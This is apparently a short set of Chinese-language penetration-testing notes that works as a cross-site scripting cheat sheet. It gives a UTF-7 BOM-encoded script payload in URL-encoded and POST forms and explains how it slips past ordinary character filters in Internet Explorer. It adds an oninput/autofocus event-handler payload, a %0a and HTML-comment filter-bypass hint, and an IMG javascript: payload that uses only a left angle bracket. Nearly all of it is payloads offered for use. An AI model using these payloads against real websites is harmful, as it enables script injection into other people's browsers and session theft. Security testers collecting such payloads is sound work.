1.将编码转换为utf-7编码,用于检测是否存在utf-7 BOM xss
按照RFC标准Header头设置的字符集优先于META和BOM等其他方式识别出的字符集,而BOM要求在文件的头几个字节。由于IE浏览器没有指定字符集的识别方式,加上常规的危险字符过滤机制,UTF-7编码中的字符集并不包含危险的字符,所以就绕过了常规的过滤机制,进行跨站脚本攻击。
payload:%2B/v8APA-script%2BAD4-alert%28/xss/%29%2BADw-/script%2BAD4-(utf-7全编码模式<script>alert(/xss/);</script>)
当请求头为post是,payload为+/v8APA-script+AD4-alert(/xss/)+ADw-/script+AD4-
2.<body οninput=alert(1)><input autofocus>
3.利用%0a绕过编码,多注意空参数,使用注释<!--
4.只含有左尖括号的payload:<IMG SRC=”javascript:alert(‘XSS’)”